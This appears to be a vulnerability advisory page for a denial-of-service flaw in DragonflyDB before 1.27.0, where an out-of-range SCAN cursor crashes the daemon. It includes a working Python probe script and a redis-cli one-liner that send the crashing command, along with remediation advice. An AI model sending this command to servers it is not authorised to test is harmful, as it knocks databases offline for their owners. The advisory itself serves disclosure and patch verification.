DragonflyDB Denial-of-Service Vulnerability via Crafted Redis Command

Vulnerability

A denial-of-service vulnerability affects DragonflyDB versions prior to 1.27.0. An authenticated client can crash the database daemon by sending a single specially crafted Redis command: the server does not validate the cursor argument of the SCAN command before using it, so an out-of-range cursor takes the Dragonfly process down. On an instance that runs without a password, any client that can reach the port counts as authenticated.

Impact

A single crafted command crashes the DragonflyDB daemon and takes the database offline until the process is restarted; the command can simply be resent after every restart. The effect is on availability only; the advisory describes no data disclosure or corruption.

Reproduction

To reproduce, send the SCAN command with a cursor outside the valid range, for example 9223372036854775808 (2^63, one more than the largest signed 64-bit integer, 9223372036854775807). An unpatched server crashes immediately on receiving the command; a patched server should instead reject the cursor with an error reply and stay up, which is the check to use when verifying an upgrade.
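The following script is an added example, not code from DragonflyDB or from this advisory. It encodes the SCAN command with the cursor above in RESP (the wire form redis-cli sends), sends it to a server, then sends PING to learn whether the daemon survived. It also contains the range check a hardened cursor parser would apply before using the value. The host, port and password handling, and the assumed valid range (ASCII decimal digits, non-negative, fitting in a signed 64-bit integer) are assumptions for illustration, not details taken from the page.

```python
import re
import socket
import sys
from typing import Optional

INT64_MAX = 2**63 - 1
BAD_CURSOR = "9223372036854775808"  # 2**63, the out-of-range cursor from the advisory

# Assumption (not from the advisory): a well-formed SCAN cursor is a string of
# ASCII decimal digits whose value fits in a signed 64-bit integer.
_CURSOR_RE = re.compile(r"^[0-9]+$")


def cursor_is_valid(cursor: str) -> bool:
    """Server-side check a hardened parser would apply before using the cursor."""
    if not _CURSOR_RE.match(cursor):   # rejects '', '-1', '+5', ' 0', non-ASCII digits
        return False
    return int(cursor) <= INT64_MAX     # rejects 2**63 and anything larger


def resp_command(*args: str) -> bytes:
    """Encode a command as a RESP array of bulk strings."""
    parts = [f"*{len(args)}\r\n".encode()]
    for arg in args:
        raw = arg.encode()
        parts.append(f"${len(raw)}\r\n".encode() + raw + b"\r\n")
    return b"".join(parts)


def probe(host: str, port: int = 6379, password: Optional[str] = None,
          timeout: float = 3.0) -> dict:
    """Send SCAN with the crafted cursor, then PING; report whether the server still answers.

    Run this only against an instance you own or are authorised to crash.
    """
    result = {"scan_reply": None, "ping_reply": None, "alive": False}
    with socket.create_connection((host, port), timeout=timeout) as sock:
        if password is not None:
            sock.sendall(resp_command("AUTH", password))
            sock.recv(4096)  # expect +OK
        try:
            sock.sendall(resp_command("SCAN", BAD_CURSOR))
            # A fixed server is expected to answer with an error; an unpatched
            # one crashes, so the read returns b"" or raises.
            result["scan_reply"] = sock.recv(4096)
            sock.sendall(resp_command("PING"))
            reply = sock.recv(4096)
            result["ping_reply"] = reply
            result["alive"] = reply.startswith(b"+PONG")
        except (socket.timeout, ConnectionError):
            pass   # connection reset or no reply: the daemon most likely went down
    return result


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    print(probe(target))
```

Run it as `python3 probe.py <host>` against a lab instance; `alive: False` after the SCAN indicates the crash described above, while a patched build returns an error for the SCAN and `alive: True`. `redis-cli -h <host> SCAN 9223372036854775808` sends the same bytes if you prefer the stock client.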

Remediation

Upgrade to DragonflyDB 1.27.0 or later, where the cursor is validated. Until the upgrade is applied, requiring a password and restricting network access to trusted clients limit who can trigger the crash but do not remove the flaw, since any authenticated client can still send the command.

Added: Jun 9, 2025, 7:46 PM
Updated: Jun 9, 2025, 7:46 PM

Vulnerability Rating

Custom Algorithm
spread: 1.4
impact: 2.5
exploitability: 6.2
remediation: 7.7
relevance: 0.0
threat: 6.4
urgency: 2.9
incentive: 1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.